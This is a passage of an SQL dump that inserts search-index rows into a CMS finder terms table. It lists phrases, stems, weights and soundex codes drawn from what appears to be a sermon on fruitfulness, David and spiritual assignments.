(270560, 'activities but', 'activ but', 0, 1, 1.4667, 'A2313213', 1, '*'),
(270561, 'activities but be', 'activ but be', 0, 1, 1.5667, 'A23132131', 1, '*'),
(270562, 'activities everyone', 'activ everyone', 0, 1, 1.6333, 'A23132165', 1, '*'),
(270563, 'activities everyone knows', 'activ everyone knows', 0, 1, 1.8333, 'A23132165252', 1, '*'),
(270564, 'activities from', 'activ from', 0, 1, 1.5, 'A23132165', 1, '*'),
(270565, 'activities from results', 'activ from results', 0, 1, 1.7667, 'A2313216562432', 1, '*'),
(270566, 'activities go', 'activ go', 0, 1, 1.4333, 'A23132', 1, '*'),
(270567, 'activities go for', 'activ go for', 0, 1, 1.5667, 'A2313216', 1, '*'),
(270568, 'activity', 'activ', 0, 0, 0.5333, 'A2313', 1, '*'),
(270569, 'activity the', 'activ the', 0, 1, 1.4, 'A2313', 1, '*'),
(270570, 'activity the right', 'activ the right', 0, 1, 1.6, 'A2313623', 1, '*'),
(270571, 'acts 4', 'act 4', 0, 1, 1.2, 'A232', 1, '*'),
(270572, 'acts 4 31-37', 'act 4 31-37', 0, 1, 1.4, 'A232', 1, '*'),
(270573, 'all israelites', 'all israelites', 0, 1, 1.4667, 'A426432', 1, '*'),
(270574, 'all israelites he', 'all israelites he', 0, 1, 1.5667, 'A426432', 1, '*'),
(270575, 'all the wells', 'all the wells', 0, 1, 1.4333, 'A4342', 1, '*'),
(270576, 'also for', 'also for', 0, 1, 1.2667, 'A4216', 1, '*'),
(270577, 'also for the', 'also for the', 0, 1, 1.4, 'A42163', 1, '*'),
(270578, 'always enquire', 'alwai enquire', 0, 1, 1.4667, 'A42526', 1, '*'),
(270579, 'always enquire of', 'alwai enquire of', 0, 1, 1.5667, 'A425261', 1, '*'),
(270580, 'always follows', 'alwai follows', 0, 1, 1.4667, 'A42142', 1, '*'),
(270581, 'always follows whenever', 'alwai follows whenever', 0, 1, 1.7667, 'A42142516', 1, '*'),
(270582, 'amazed', 'amaz', 0, 0, 0.4, 'A523', 1, '*'),
(270583, 'amazed that', 'amaz that', 0, 1, 1.3667, 'A523', 1, '*'),
(270584, 'amazed that god', 'amaz that god', 0, 1, 1.5, 'A52323', 1, '*'),
(270585, 'an absalom', 'an absalom', 0, 1, 1.3333, 'A51245', 1, '*'),
(270586, 'an absalom in', 'an absalom in', 0, 1, 1.4333, 'A51245', 1, '*'),
(270587, 'an assignment you', 'an assignment you', 0, 1, 1.5667, 'A5253', 1, '*'),
(270588, 'an assignments', 'an assignments', 0, 1, 1.4667, 'A52532', 1, '*'),
(270589, 'an assignments every', 'an assignments every', 0, 1, 1.6667, 'A5253216', 1, '*'),
(270590, 'an effective', 'an effective', 0, 1, 1.4, 'A51231', 2, '*'),
(270591, 'an effective christian', 'an effective christian', 0, 1, 1.7333, 'A5123126235', 1, '*'),
(270592, 'an unfruitful', 'an unfruitful', 0, 1, 1.4333, 'A516314', 1, '*'),
(270593, 'an unfruitful child', 'an unfruitful child', 0, 1, 1.6333, 'A516314243', 1, '*'),
(270594, 'and called them', 'and called them', 0, 1, 1.5, 'A532435', 1, '*'),
(270595, 'and in saul', 'and in saul', 0, 1, 1.3667, 'A53524', 1, '*'),
(270596, 'and interruption', 'and interruption', 0, 1, 1.5333, 'A53536135', 1, '*'),
(270597, 'and interruption the', 'and interruption the', 0, 1, 1.6667, 'A535361353', 1, '*'),
(270598, 'and it takes', 'and it takes', 0, 1, 1.4, 'A532', 1, '*'),
(270599, 'and not an', 'and not an', 0, 1, 1.3333, 'A53535', 1, '*'),
(270600, 'and potentials', 'and potentials', 0, 1, 1.4667, 'A53135342', 1, '*'),
(270601, 'and potentials matthew', 'and potentials matthew', 0, 1, 1.7333, 'A5313534253', 1, '*'),
(270602, 'and said when', 'and said when', 0, 1, 1.4333, 'A53235', 1, '*'),
(270603, 'and special', 'and special', 0, 1, 1.3667, 'A532124', 1, '*'),
(270604, 'and special ability', 'and special ability', 0, 1, 1.6333, 'A532124143', 1, '*'),
(270605, 'and the glory', 'and the glory', 0, 1, 1.4333, 'A53246', 1, '*'),
(270606, 'and the right', 'and the right', 0, 1, 1.4333, 'A53623', 1, '*'),
(270607, 'and the training', 'and the training', 0, 1, 1.5333, 'A53652', 1, '*'),
(270608, 'and you could', 'and you could', 0, 1, 1.4333, 'A53243', 1, '*'),
(270609, 'anointing for assignments', 'anoint for assignments', 0, 1, 1.8333, 'A5352162532', 1, '*'),
(270610, 'another don\'t', 'anoth don', 0, 1, 1.4333, 'A536353', 1, '*'),
(270611, 'another don\'t use', 'anoth don use', 0, 1, 1.5667, 'A5363532', 1, '*'),
(270612, 'another person\'s style', 'anoth person style', 0, 1, 1.7333, 'A5361625234', 1, '*'),
(270613, 'any fruits', 'ani fruits', 0, 1, 1.3333, 'A51632', 1, '*'),
(270614, 'any fruits to', 'ani fruits to', 0, 1, 1.4333, 'A516323', 1, '*'),
(270615, 'any labour', 'ani labour', 0, 1, 1.3333, 'A5416', 1, '*'),
(270616, 'any labour to', 'ani labour to', 0, 1, 1.4333, 'A54163', 1, '*'),
(270617, 'apostles', 'apostl', 0, 0, 0.5333, 'A12342', 1, '*'),
(270618, 'apostles in', 'apostl in', 0, 1, 1.3667, 'A123425', 1, '*'),
(270619, 'apostles in acts', 'apostl in acts', 0, 1, 1.5333, 'A123425232', 1, '*'),
(270620, 'approach an', 'approach an', 0, 1, 1.3667, 'A1625', 1, '*'),
(270621, 'approach an assignments', 'approach an assignments', 0, 1, 1.7667, 'A16252532', 1, '*'),
(270622, 'are coordinating', 'ar coordinating', 0, 1, 1.5333, 'A62635352', 1, '*'),
(270623, 'are coordinating you', 'ar coordinating you', 0, 1, 1.6667, 'A62635352', 1, '*'),
(270624, 'are doing something', 'ar doing something', 0, 1, 1.6333, 'A63525352', 1, '*'),
(270625, 'are few god', 'ar few god', 0, 1, 1.3667, 'A6123', 1, '*'),
(270626, 'are occupied', 'ar occupied', 0, 1, 1.4, 'A6213', 1, '*'),
(270627, 'are occupied by', 'ar occupied by', 0, 1, 1.5, 'A62131', 1, '*'),
(270628, 'are what men', 'ar what men', 0, 1, 1.4, 'A635', 1, '*'),
(270629, 'are winning', 'ar winning', 0, 1, 1.3667, 'A652', 1, '*'),
(270630, 'are winning the', 'ar winning the', 0, 1, 1.5, 'A6523', 1, '*'),
(270631, 'armour', 'armour', 0, 0, 0.4, 'A656', 1, '*'),
(270632, 'armour will', 'armour will', 0, 1, 1.3667, 'A6564', 1, '*'),
(270633, 'armour will not', 'armour will not', 0, 1, 1.5, 'A656453', 1, '*'),
(270634, 'as far', 'as far', 0, 1, 1.2, 'A216', 1, '*'),
(270635, 'as far as', 'as far as', 0, 1, 1.3, 'A2162', 1, '*'),
(270636, 'as what', 'as what', 0, 1, 1.2333, 'A230', 1, '*'),
(270637, 'as what god', 'as what god', 0, 1, 1.3667, 'A2323', 1, '*'),
(270638, 'assignment has', 'assign has', 0, 1, 1.4667, 'A2532', 1, '*'),
(270639, 'assignment has its', 'assign has its', 0, 1, 1.6, 'A253232', 1, '*'),
(270640, 'assignments according', 'assign according', 0, 1, 1.7, 'A25326352', 1, '*'),
(270641, 'assignments according to', 'assign according to', 0, 1, 1.8, 'A253263523', 1, '*'),
(270642, 'assignments don\'t', 'assign don', 0, 1, 1.5667, 'A2532353', 1, '*'),
(270643, 'assignments don\'t compare', 'assign don compare', 0, 1, 1.8333, 'A25323532516', 1, '*'),
(270644, 'assignments eliab', 'assign eliab', 0, 1, 1.5667, 'A253241', 1, '*'),
(270645, 'assignments eliab had', 'assign eliab had', 0, 1, 1.7, 'A2532413', 1, '*'),
(270646, 'assignments every', 'assign every', 0, 1, 1.5667, 'A253216', 1, '*'),
(270647, 'assignments every assignment', 'assign every assignment', 0, 1, 1.9333, 'A253216253', 1, '*'),
(270648, 'at an unfruitful', 'at an unfruitful', 0, 1, 1.5333, 'A3516314', 1, '*'),
(270649, 'avoid the works', 'avoid the works', 0, 1, 1.5, 'A1362', 1, '*'),
(270650, 'battle 5', 'battl 5', 0, 1, 1.2667, 'B340', 1, '*'),
(270651, 'battle 5 be', 'battl 5 be', 0, 1, 1.3667, 'B341', 1, '*'),
(270652, 'be a replaceable', 'be a replaceable', 0, 1, 1.5333, 'B614214', 1, '*'),
(270653, 'be a replacement', 'be a replacement', 0, 1, 1.5333, 'B614253', 1, '*'),
(270654, 'be a solomon', 'be a solomon', 0, 1, 1.4, 'B245', 1, '*'),
(270655, 'be amazed', 'be amazed', 0, 1, 1.3, 'B523', 1, '*'),
(270656, 'be amazed that', 'be amazed that', 0, 1, 1.4667, 'B523', 1, '*'),
(270657, 'be committed', 'be committed', 0, 1, 1.4, 'B253', 1, '*'),
(270658, 'be committed to', 'be committed to', 0, 1, 1.5, 'B253', 1, '*'),
(270659, 'be done in', 'be done in', 0, 1, 1.3333, 'B350', 1, '*'),
(270660, 'be yourself', 'be yourself', 0, 1, 1.3667, 'B6241', 1, '*'),
(270661, 'be yourself the', 'be yourself the', 0, 1, 1.5, 'B62413', 1, '*'),
(270662, 'becoming an', 'becom an', 0, 1, 1.3667, 'B2525', 1, '*'),
(270663, 'becoming an effective', 'becom an effective', 0, 1, 1.7, 'B25251231', 1, '*'),
(270664, 'before and', 'befor and', 0, 1, 1.3333, 'B653', 1, '*'),
(270665, 'before and called', 'befor and called', 0, 1, 1.5667, 'B653243', 1, '*'),
(270666, 'believers for', 'believ for', 0, 1, 1.4333, 'B416216', 1, '*'),
(270667, 'believers for any', 'believ for any', 0, 1, 1.5667, 'B4162165', 1, '*'),
(270668, 'birth accuracy', 'birth accuracy', 0, 1, 1.4667, 'B63262', 1, '*'),
(270669, 'birth accuracy knowing', 'birth accuracy knowing', 0, 1, 1.7333, 'B6326252', 1, '*'),
(270670, 'body of christ', 'bodi of christ', 0, 1, 1.4667, 'B312623', 1, '*'),
(270671, 'branches', 'branch', 0, 0, 0.5333, 'B652', 1, '*'),
(270672, 'branches branches', 'branch branches', 0, 1, 1.5667, 'B6521652', 1, '*'),
(270673, 'branches branches that', 'branch branches that', 0, 1, 1.7333, 'B65216523', 1, '*'),
(270674, 'branches he', 'branch he', 0, 1, 1.3667, 'B652', 1, '*'),
(270675, 'branches he wants', 'branch he wants', 0, 1, 1.5667, 'B652532', 1, '*'),
(270676, 'branches that', 'branch that', 0, 1, 1.4333, 'B6523', 1, '*'),
(270677, 'branches that give', 'branch that give', 0, 1, 1.6, 'B652321', 1, '*'),
(270678, 'bring about', 'bring about', 0, 1, 1.3667, 'B65213', 1, '*'),
(270679, 'bring about the', 'bring about the', 0, 1, 1.5, 'B65213', 1, '*'),
(270680, 'bring forth the', 'bring forth the', 0, 1, 1.5, 'B652163', 1, '*'),
(270681, 'bring fruit', 'bring fruit', 0, 1, 1.3667, 'B652163', 1, '*'),
(270682, 'bring fruit so', 'bring fruit so', 0, 1, 1.4667, 'B6521632', 1, '*'),
(270683, 'bring more he', 'bring more he', 0, 1, 1.4333, 'B65256', 1, '*'),
(270684, 'brought forth water', 'brought forth water', 0, 1, 1.6333, 'B6231636', 1, '*'),
(270685, 'builds a', 'build a', 0, 1, 1.2667, 'B432', 1, '*'),
(270686, 'builds a monument', 'build a monument', 0, 1, 1.5667, 'B43253', 1, '*'),
(270687, 'built the', 'built the', 0, 1, 1.3, 'B430', 1, '*'),
(270688, 'built the temple', 'built the temple', 0, 1, 1.5333, 'B43514', 1, '*'),
(270689, 'but as', 'but as', 0, 1, 1.2, 'B320', 1, '*'),
(270690, 'but as far', 'but as far', 0, 1, 1.3333, 'B3216', 1, '*'),
(270691, 'but be', 'but be', 0, 1, 1.2, 'B310', 1, '*'),
(270692, 'but be full', 'but be full', 0, 1, 1.3667, 'B314', 1, '*'),
(270693, 'but david', 'but david', 0, 1, 1.3, 'B313', 1, '*'),
(270694, 'but david had', 'but david had', 0, 1, 1.4333, 'B313', 1, '*'),
(270695, 'but labourers', 'but labourers', 0, 1, 1.4333, 'B34162', 1, '*'),
(270696, 'but labourers are', 'but labourers are', 0, 1, 1.5667, 'B341626', 1, '*'),
(270697, 'but result', 'but result', 0, 1, 1.3333, 'B36243', 1, '*'),
(270698, 'but result is', 'but result is', 0, 1, 1.4333, 'B362432', 1, '*'),
(270699, 'but they have', 'but they have', 0, 1, 1.4333, 'B310', 1, '*'),
(270700, 'but without any', 'but without any', 0, 1, 1.5, 'B350', 1, '*'),
(270701, 'by activities', 'by activities', 0, 1, 1.4333, 'B23132', 1, '*'),
(270702, 'by activities everyone', 'by activities everyone', 0, 1, 1.7333, 'B23132165', 1, '*'),
(270703, 'called them', 'call them', 0, 1, 1.3667, 'C435', 1, '*'),
(270704, 'called them and', 'call them and', 0, 1, 1.5, 'C4353', 1, '*'),
(270705, 'called them the', 'call them the', 0, 1, 1.5, 'C4353', 1, '*'),
(270706, 'calls them', 'call them', 0, 1, 1.3333, 'C4235', 1, '*'),
(270707, 'calls them wicked', 'call them wicked', 0, 1, 1.5667, 'C423523', 1, '*'),
(270708, 'came to david', 'came to david', 0, 1, 1.4333, 'C5313', 1, '*'),
(270709, 'came unto', 'came unto', 0, 1, 1.3, 'C530', 1, '*'),
(270710, 'came unto the', 'came unto the', 0, 1, 1.4333, 'C530', 1, '*'),
(270711, 'can give you', 'can give you', 0, 1, 1.4, 'C521', 1, '*'),
(270712, 'can god', 'can god', 0, 1, 1.2333, 'C523', 1, '*'),
(270713, 'can god depend', 'can god depend', 0, 1, 1.4667, 'C523153', 1, '*'),
(270714, 'capacity of', 'capac of', 0, 1, 1.3667, 'C1231', 1, '*'),
(270715, 'capacity of your', 'capac of your', 0, 1, 1.5333, 'C12316', 1, '*'),
(270716, 'care to', 'care to', 0, 1, 1.2333, 'C630', 1, '*'),
(270717, 'care to prune', 'care to prune', 0, 1, 1.4333, 'C63165', 1, '*'),
(270718, 'carry the life', 'carri the life', 0, 1, 1.4667, 'C6341', 1, '*'),
(270719, 'chased', 'chase', 0, 0, 0.4, 'C300', 1, '*'),
(270720, 'chased his', 'chase his', 0, 1, 1.3333, 'C320', 1, '*'),
(270721, 'chased his father', 'chase his father', 0, 1, 1.5667, 'C32136', 1, '*'),
(270722, 'child he', 'child he', 0, 1, 1.2667, 'C430', 1, '*'),
(270723, 'child he is', 'child he is', 0, 1, 1.3667, 'C432', 1, '*'),
(270724, 'children produce', 'children produce', 0, 1, 1.5333, 'C43651632', 1, '*'),
(270725, 'children produce fruit', 'children produce fruit', 0, 1, 1.7333, 'C43651632163', 1, '*'),
(270726, 'chr', 'chr', 0, 0, 0.2, 'C600', 1, '*'),
(270727, 'chr 28', 'chr 28', 0, 1, 1.2, 'C600', 1, '*'),
(270728, 'chr 28 19', 'chr 28 19', 0, 1, 1.3, 'C600', 1, '*'),
(270729, 'christ today', 'christ today', 0, 1, 1.4, 'C623', 1, '*'),
(270730, 'christ today is', 'christ today is', 0, 1, 1.5, 'C6232', 1, '*'),
(270731, 'christian in these', 'christian in these', 0, 1, 1.6, 'C623532', 1, '*'),
(270732, 'christian should not', 'christian should not', 0, 1, 1.6667, 'C623524353', 1, '*'),
(270733, 'christian with', 'christian with', 0, 1, 1.4667, 'C62353', 1, '*'),
(270734, 'christian with results', 'christian with results', 0, 1, 1.7333, 'C6235362432', 1, '*'),
(270735, 'christians he', 'christian he', 0, 1, 1.4333, 'C62352', 1, '*'),
(270736, 'christians he calls', 'christian he calls', 0, 1, 1.6333, 'C6235242', 1, '*'),
(270737, 'church membership is', 'church membership is', 0, 1, 1.6667, 'C62516212', 1, '*'),
(270738, 'cleanse those', 'cleans those', 0, 1, 1.4333, 'C45232', 1, '*'),
(270739, 'cleanse those who', 'cleans those who', 0, 1, 1.5667, 'C45232', 1, '*'),
(270740, 'come for the', 'come for the', 0, 1, 1.4, 'C5163', 1, '*'),
(270741, 'coming also', 'come also', 0, 1, 1.3667, 'C5242', 1, '*'),
(270742, 'coming also for', 'come also for', 0, 1, 1.5, 'C524216', 1, '*'),
(270743, 'coming for', 'come for', 0, 1, 1.3333, 'C5216', 1, '*'),
(270744, 'coming for you', 'come for you', 0, 1, 1.4667, 'C5216', 1, '*'),
(270745, 'coming to judge', 'come to judge', 0, 1, 1.5, 'C523232', 1, '*'),
(270746, 'committed to producing', 'commit to producing', 0, 1, 1.7333, 'C53163252', 1, '*'),
(270747, 'committee', 'committe', 0, 0, 0.6, 'C530', 1, '*'),
(270748, 'committee or', 'committe or', 0, 1, 1.4, 'C536', 1, '*'),
(270749, 'committee or that', 'committe or that', 0, 1, 1.5667, 'C5363', 1, '*'),
(270750, 'compare', 'compar', 0, 0, 0.4667, 'C516', 1, '*'),
(270751, 'compare yourself', 'compar yourself', 0, 1, 1.5333, 'C516241', 1, '*'),
(270752, 'compare yourself with', 'compar yourself with', 0, 1, 1.7, 'C5162413', 1, '*'),
(270753, 'compete', 'compet', 0, 0, 0.4667, 'C513', 1, '*'),
(270754, 'compete in', 'compet in', 0, 1, 1.3333, 'C5135', 1, '*'),
(270755, 'compete in the', 'compet in the', 0, 1, 1.4667, 'C51353', 1, '*'),
(270756, 'concerned', 'concern', 0, 0, 0.6, 'C52653', 2, '*'),
(270757, 'concerned david', 'concern david', 0, 1, 1.5, 'C5265313', 1, '*'),
(270758, 'concerned david was', 'concern david was', 0, 1, 1.6333, 'C52653132', 1, '*'),
(270759, 'contribution', 'contribut', 0, 0, 0.8, 'C536135', 1, '*'),
(270760, 'contribution to', 'contribut to', 0, 1, 1.5, 'C5361353', 1, '*'),
(270761, 'contribution to god\'s', 'contribut to god', 0, 1, 1.7, 'C5361353232', 1, '*'),
(270762, 'coordinating', 'coordin', 0, 0, 0.8, 'C635352', 1, '*'),
(270763, 'coordinating you', 'coordin you', 0, 1, 1.5333, 'C635352', 1, '*'),
(270764, 'coordinating you must', 'coordin you must', 0, 1, 1.7, 'C635352523', 1, '*'),
(270765, 'could see', 'could see', 0, 1, 1.3, 'C432', 1, '*'),
(270766, 'could see that', 'could see that', 0, 1, 1.4667, 'C4323', 1, '*'),
(270767, 'curse a', 'curs a', 0, 1, 1.2333, 'C620', 1, '*'),
(270768, 'curse a fig', 'curs a fig', 0, 1, 1.3667, 'C6212', 1, '*'),
(270769, 'david and', 'david and', 0, 1, 1.3, 'D1353', 1, '*'),
(270770, 'david and said', 'david and said', 0, 1, 1.4667, 'D135323', 1, '*'),
(270771, 'david had the', 'david had the', 0, 1, 1.4333, 'D130', 1, '*'),
(270772, 'david it is', 'david it is', 0, 1, 1.3667, 'D132', 1, '*'),
(270773, 'david to', 'david to', 0, 1, 1.2667, 'D130', 1, '*'),
(270774, 'david to be', 'david to be', 0, 1, 1.3667, 'D131', 1, '*'),
(270775, 'david was the', 'david was the', 0, 1, 1.4333, 'D1323', 1, '*'),
(270776, 'david will', 'david will', 0, 1, 1.3333, 'D134', 1, '*'),
(270777, 'david will always', 'david will always', 0, 1, 1.5667, 'D1342', 1, '*'),
(270778, 'day amen', 'dai amen', 0, 1, 1.2667, 'D500', 1, '*'),
(270779, 'day that god', 'dai that god', 0, 1, 1.4, 'D230', 1, '*'),
(270780, 'depend on youas', 'depend on youas', 0, 1, 1.5, 'D15352', 1, '*'),
(270781, 'destiny formation', 'destini formation', 0, 1, 1.5667, 'D23516535', 1, '*'),
(270782, 'destiny formation in', 'destini formation in', 0, 1, 1.6667, 'D23516535', 1, '*'),
(270783, 'did not dig', 'did not dig', 0, 1, 1.3667, 'D532', 1, '*'),
(270784, 'dig', 'dig', 0, 0, 0.2, 'D200', 1, '*'),
(270785, 'dig new', 'dig new', 0, 1, 1.2333, 'D250', 1, '*'),
(270786, 'dig new wells', 'dig new wells', 0, 1, 1.4333, 'D2542', 1, '*'),
(270787, 'disappoint the', 'disappoint the', 0, 1, 1.4667, 'D2153', 1, '*'),
(270788, 'disappoint the heavenly', 'disappoint the heavenly', 0, 1, 1.7667, 'D2153154', 1, '*'),
(270789, 'distinct', 'distinct', 0, 0, 0.5333, 'D23523', 1, '*'),
(270790, 'distinct don\'t', 'distinct don', 0, 1, 1.4667, 'D2352353', 1, '*'),
(270791, 'distinct don\'t compete', 'distinct don compete', 0, 1, 1.7333, 'D23523532513', 1, '*'),
(270792, 'divine intervention and', 'divin intervention and', 0, 1, 1.7667, 'D153615353', 1, '*'),
(270793, 'do assignments', 'do assignments', 0, 1, 1.4667, 'D2532', 1, '*'),
(270794, 'do assignments according', 'do assignments according', 0, 1, 1.8, 'D25326352', 1, '*'),
(270795, 'doing something but', 'do something but', 0, 1, 1.6333, 'D52535213', 1, '*'),
(270796, 'doing was', 'do was', 0, 1, 1.3, 'D520', 1, '*'),
(270797, 'doing was concerned', 'do was concerned', 0, 1, 1.6333, 'D5252653', 1, '*'),
(270798, 'don\'t compare', 'don compare', 0, 1, 1.4333, 'D532516', 1, '*'),
(270799, 'don\'t compare yourself', 'don compare yourself', 0, 1, 1.7333, 'D532516241', 1, '*'),
(270800, 'don\'t compete', 'don compete', 0, 1, 1.4333, 'D532513', 1, '*'),
(270801, 'don\'t compete in', 'don compete in', 0, 1, 1.5333, 'D5325135', 1, '*'),
(270802, 'don\'t use another', 'don use another', 0, 1, 1.5667, 'D532536', 1, '*'),
(270803, 'done in love', 'done in love', 0, 1, 1.4, 'D541', 1, '*'),
(270804, 'dug', 'dug', 0, 0, 0.2, 'D200', 1, '*'),
(270805, 'dug before', 'dug before', 0, 1, 1.3333, 'D216', 1, '*'),
(270806, 'dug before and', 'dug before and', 0, 1, 1.4667, 'D21653', 1, '*'),
(270807, 'dug the', 'dug the', 0, 1, 1.2333, 'D230', 1, '*'),
(270808, 'dug the wells', 'dug the wells', 0, 1, 1.4333, 'D2342', 1, '*'),
(270809, 'eccl', 'eccl', 0, 0, 0.2667, 'E240', 1, '*'),
(270810, 'eccl 10', 'eccl 10', 0, 1, 1.2333, 'E240', 1, '*'),
(270811, 'eccl 10 10', 'eccl 10 10', 0, 1, 1.3333, 'E240', 1, '*'),
(270812, 'effective christian', 'effect christian', 0, 1, 1.6333, 'E123126235', 1, '*'),
(270813, 'effective christian in', 'effect christian in', 0, 1, 1.7333, 'E123126235', 1, '*'),
(270814, 'elders', 'elder', 0, 0, 0.4, 'E4362', 1, '*'),
(270815, 'elders of', 'elder of', 0, 1, 1.3, 'E43621', 1, '*'),
(270816, 'elders of israel', 'elder of israel', 0, 1, 1.5333, 'E43621264', 1, '*'),
(270817, 'eliab', 'eliab', 0, 0, 0.3333, 'E410', 1, '*'),
(270818, 'eliab had', 'eliab had', 0, 1, 1.3, 'E413', 1, '*'),
(270819, 'eliab had the', 'eliab had the', 0, 1, 1.4333, 'E413', 1, '*'),
(270820, 'end time will', 'end time will', 0, 1, 1.4333, 'E5354', 1, '*'),
(270821, 'enough that', 'enough that', 0, 1, 1.3667, 'E523', 1, '*'),
(270822, 'enough that you\'re', 'enough that you', 0, 1, 1.6, 'E5236', 1, '*'),
(270823, 'enquire', 'enquir', 0, 0, 0.4667, 'E526', 1, '*'),
(270824, 'enquire of', 'enquir of', 0, 1, 1.3333, 'E5261', 1, '*'),
(270825, 'enquire of the', 'enquir of the', 0, 1, 1.4667, 'E52613', 1, '*'),
(270826, 'evangelism is', 'evangel is', 0, 1, 1.4333, 'E1524252', 1, '*'),
(270827, 'evangelism is salvation', 'evangel is salvation', 0, 1, 1.7667, 'E15242524135', 1, '*'),
(270828, 'even jesus had', 'even jesus had', 0, 1, 1.4667, 'E1523', 1, '*'),
(270829, 'every assignment', 'everi assignment', 0, 1, 1.5333, 'E16253', 1, '*'),
(270830, 'every assignment has', 'everi assignment has', 0, 1, 1.6667, 'E162532', 1, '*'),
(270831, 'everyone knows', 'everyon knows', 0, 1, 1.4667, 'E165252', 1, '*'),
(270832, 'everyone knows that', 'everyon knows that', 0, 1, 1.6333, 'E1652523', 1, '*'),
(270833, 'eye service', 'ey service', 0, 1, 1.3667, 'E2612', 1, '*'),
(270834, 'eye service facefulness', 'ey service facefulness', 0, 1, 1.7667, 'E2612121452', 1, '*'),
(270835, 'facefulness', 'face', 0, 0, 0.7333, 'F21452', 1, '*'),
(270836, 'facefulness can', 'face can', 0, 1, 1.5, 'F214525', 1, '*'),
(270837, 'facefulness can give', 'face can give', 0, 1, 1.6667, 'F21452521', 1, '*'),
(270838, 'facefulness matthew', 'face matthew', 0, 1, 1.6333, 'F2145253', 1, '*'),
(270839, 'facefulness matthew 24', 'face matthew 24', 0, 1, 1.7333, 'F2145253', 1, '*'),
(270840, 'faithfulness not', 'faith not', 0, 1, 1.5333, 'F3145253', 1, '*'),
(270841, 'faithfulness not eye', 'faith not eye', 0, 1, 1.6667, 'F3145253', 1, '*'),
(270842, 'faithfulness not facefulness', 'faith not facefulness', 0, 1, 1.9333, 'F3145253121452', 1, '*'),
(270843, 'faithfulness to', 'faith to', 0, 1, 1.5, 'F314523', 1, '*'),
(270844, 'faithfulness to carry', 'faith to carry', 0, 1, 1.7, 'F31452326', 1, '*'),
(270845, 'far as', 'far as', 0, 1, 1.2, 'F620', 1, '*'),
(270846, 'far as what', 'far as what', 0, 1, 1.3667, 'F623', 1, '*'),
(270847, 'father called', 'father called', 0, 1, 1.4333, 'F36243', 1, '*'),
(270848, 'father called them', 'father called them', 0, 1, 1.6, 'F362435', 1, '*'),
(270849, 'father from', 'father from', 0, 1, 1.3667, 'F36165', 1, '*'),
(270850, 'father from the', 'father from the', 0, 1, 1.5, 'F361653', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(270851, 'father had', 'father had', 0, 1, 1.3333, 'F363', 1, '*'),
(270852, 'father had dug', 'father had dug', 0, 1, 1.4667, 'F3632', 1, '*'),
(270853, 'father john', 'father john', 0, 1, 1.3667, 'F3625', 1, '*'),
(270854, 'father john 15', 'father john 15', 0, 1, 1.4667, 'F3625', 1, '*'),
(270855, 'father received', 'father received', 0, 1, 1.5, 'F36213', 1, '*'),
(270856, 'father received and', 'father received and', 0, 1, 1.6333, 'F3621353', 1, '*'),
(270857, 'father rejoices', 'father rejoices', 0, 1, 1.5, 'F362', 1, '*'),
(270858, 'father rejoices when', 'father rejoices when', 0, 1, 1.6667, 'F3625', 1, '*'),
(270859, 'father\'s house', 'father house', 0, 1, 1.4667, 'F362', 1, '*'),
(270860, 'father\'s house 2', 'father house 2', 0, 1, 1.5333, 'F362', 1, '*'),
(270861, 'father\'s house solomon', 'father house solomon', 0, 1, 1.7333, 'F36245', 1, '*'),
(270862, 'few god', 'few god', 0, 1, 1.2333, 'F230', 1, '*'),
(270863, 'few god is', 'few god is', 0, 1, 1.3333, 'F232', 1, '*'),
(270864, 'fig tree', 'fig tree', 0, 1, 1.2667, 'F236', 1, '*'),
(270865, 'fig tree that', 'fig tree that', 0, 1, 1.4333, 'F2363', 1, '*'),
(270866, 'filled with people', 'fill with people', 0, 1, 1.6, 'F4314', 1, '*'),
(270867, 'flesh gal', 'flesh gal', 0, 1, 1.3, 'F424', 1, '*'),
(270868, 'flesh gal 5', 'flesh gal 5', 0, 1, 1.3667, 'F424', 1, '*'),
(270869, 'follow-up', 'follow-up', 0, 0, 0.6, 'F410', 1, '*'),
(270870, 'follow-up is', 'follow-up is', 0, 1, 1.4, 'F412', 1, '*'),
(270871, 'follow-up is membership', 'follow-up is membership', 0, 1, 1.7667, 'F41251621', 1, '*'),
(270872, 'follows whenever', 'follow whenever', 0, 1, 1.5333, 'F42516', 1, '*'),
(270873, 'follows whenever jesus', 'follow whenever jesus', 0, 1, 1.7333, 'F425162', 1, '*'),
(270874, 'for any', 'for any', 0, 1, 1.2333, 'F650', 1, '*'),
(270875, 'for any labour', 'for any labour', 0, 1, 1.4667, 'F65416', 1, '*'),
(270876, 'for assignments', 'for assignments', 0, 1, 1.5, 'F62532', 1, '*'),
(270877, 'for assignments eliab', 'for assignments eliab', 0, 1, 1.7, 'F6253241', 1, '*'),
(270878, 'for david it', 'for david it', 0, 1, 1.4, 'F6313', 1, '*'),
(270879, 'for himself', 'for himself', 0, 1, 1.3667, 'F65241', 1, '*'),
(270880, 'for himself in', 'for himself in', 0, 1, 1.4667, 'F652415', 1, '*'),
(270881, 'for it a', 'for it a', 0, 1, 1.2667, 'F630', 1, '*'),
(270882, 'for it the', 'for it the', 0, 1, 1.3333, 'F630', 1, '*'),
(270883, 'for reapers', 'for reapers', 0, 1, 1.3667, 'F6162', 1, '*'),
(270884, 'for reapers can', 'for reapers can', 0, 1, 1.5, 'F61625', 1, '*'),
(270885, 'for results', 'for results', 0, 1, 1.3667, 'F62432', 1, '*'),
(270886, 'for results the', 'for results the', 0, 1, 1.5, 'F624323', 1, '*'),
(270887, 'for saul', 'for saul', 0, 1, 1.2667, 'F624', 1, '*'),
(270888, 'for saul because', 'for saul because', 0, 1, 1.5333, 'F62412', 1, '*'),
(270889, 'for the body', 'for the body', 0, 1, 1.4, 'F6313', 1, '*'),
(270890, 'for the life', 'for the life', 0, 1, 1.4, 'F6341', 1, '*'),
(270891, 'for the unfruitful', 'for the unfruitful', 0, 1, 1.6, 'F63516314', 1, '*'),
(270892, 'for you it\'s', 'for you it', 0, 1, 1.4, 'F632', 1, '*'),
(270893, 'formation', 'format', 0, 0, 0.6, 'F6535', 1, '*'),
(270894, 'formation in', 'format in', 0, 1, 1.4, 'F6535', 1, '*'),
(270895, 'formation in you', 'format in you', 0, 1, 1.5333, 'F6535', 1, '*'),
(270896, 'forth the', 'forth the', 0, 1, 1.3, 'F630', 1, '*'),
(270897, 'forth the fruit', 'forth the fruit', 0, 1, 1.5, 'F63163', 1, '*'),
(270898, 'forth water', 'forth water', 0, 1, 1.3667, 'F636', 1, '*'),
(270899, 'forth water 6', 'forth water 6', 0, 1, 1.4333, 'F636', 1, '*'),
